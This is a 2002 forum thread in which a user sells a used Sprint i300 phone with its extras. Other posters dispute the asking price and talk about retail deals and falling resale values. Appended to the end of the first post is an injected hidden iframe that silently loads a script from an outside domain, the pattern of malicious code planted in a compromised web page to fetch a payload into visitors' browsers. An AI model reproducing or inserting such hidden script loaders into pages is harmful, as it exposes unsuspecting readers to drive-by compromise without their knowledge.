+ Reply to Thread

I300 + Extras for Sale

Hey everyone, it has come time for me to sell my I300. I am upgrading to the toshiba 2032 this week so here we go: I have owned the phone since mid-may and have taken extremely good care of it. Never dropped, always took care of screen to make sure it wasn't being pressed up against anything damaging. I purchased the screen protectors and swapped them regularly. The only barely noticable traces of wear/tear are very small, short sliver-sized slits of missing paint around two corners of the phone, and a very small scratch on bottom of the extended battery I purchased for the phone. I also bought the belkin car charger from best buy so it's the official one not the cheapo you see on ebay from time to time. Not sure how big of a difference that makes but hey... just for the record. Anyways I am selling the phone with all the original packaging, manuals, software, cradle, cables etc, the extended battery, screen protectors and car charger for $420, (which I'm willing to work on a little) which includes standard shipping to anywhere in the US. I am also listing this phone on ebay right after I post this (sunday evening, 7:10 pm, Denver, CO mountain time) so if you're interested please write me asap. I'll be happy to answer any and all questions.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by bedoughty; 09-08-2002 at 08:42 PM.
    --
    if dreams are like movies
    then memories are films about ghosts

Napoleon Bonaparte Jr.

hello

Where are you buying Toshiba 2032 ?

I bought my I300 from Circuit City two weeks ago, brand new for $279.00.
    No, danger is my MIDDLE name

Napoleon Bonaparte Jr.

hello

Mad Skillz
    I bought my I300 from Circuit City two weeks ago, brand new for $279.00.

I bought my I300 in february , brand new for $249,00 .

weird...

Ah is this a strange joke or what? Last I checked at the circuit city's out here (Denver, CO) the phone was $499, and then a $100 rebate for new signups. Where do you live? Sprint's website lists the phone still at $499... you sure you bought it AT circuit city instead of like, around back from some guy who called himself "Jamal?" I honestly want to price this phone and the extras I'm offerring fairly, especially with the extended battery, screen protectors and car charger but $279 for a new phone sounds a little outrageous.
    --

Oh and Sprint I'm buying the toshiba 2032 directly from sprint, I hate waiting for retail stores to get phones like that... sprint says best buy got the n400 before they themselves could sell it, but it always seems like these really higher ended phones are best bought directly from sprint. I would imagine because there isn't as much of a demand for phones like the toshiba on a consumer/retail level.
    --

Administrator

Arrow

Originally posted by bedoughty
    ...but it always seems like these really higher ended phones are best bought directly from sprint. I would imagine because there isn't as much of a demand for phones like the toshiba on a consumer/retail level.
    which is why i have gotten the 6035 and i300s direct!

Circuit City's current price is $449. I did a price match with The Wiz, a local retailer here in NYC. Their price was $299. I was going to buy it at the Wiz but I like Circuit city better + they give you 10% of the difference in price. This is not including the $50 new cust rebate.

Change of plans

I think I'm going to do what father jim did and simply provide a link to the auction on ebay. I've also brought the price (well the 'buy it now price' I guess) to $350 with all the extras including shipping. Let me know if you guys think that's still a little high.

ebay auction:
    http://cgi.ebay.com/ws/eBayISAPI.dll...379915777&rd=1
    --

Re: Change of plans

Originally posted by bedoughty
    Let me know if you guys think that's still a little high.

ebay auction:
    http://cgi.ebay.com/ws/eBayISAPI.dll...379915777&rd=1
    Perhaps, I believe the average price for a used I300 on ebay is between $200 - $250.

But hey, you never know!

The advent of G3 phones has killed the resale value of the older tecnology. I tracked an i300 on ebay last week that went for $175 and it was still under warranty. Six months ago I sold a 14.4 Aircard 510 for $110, they are now going for $30+ . Its the cost of buying top of the line technology, you get the top of the line price drop off.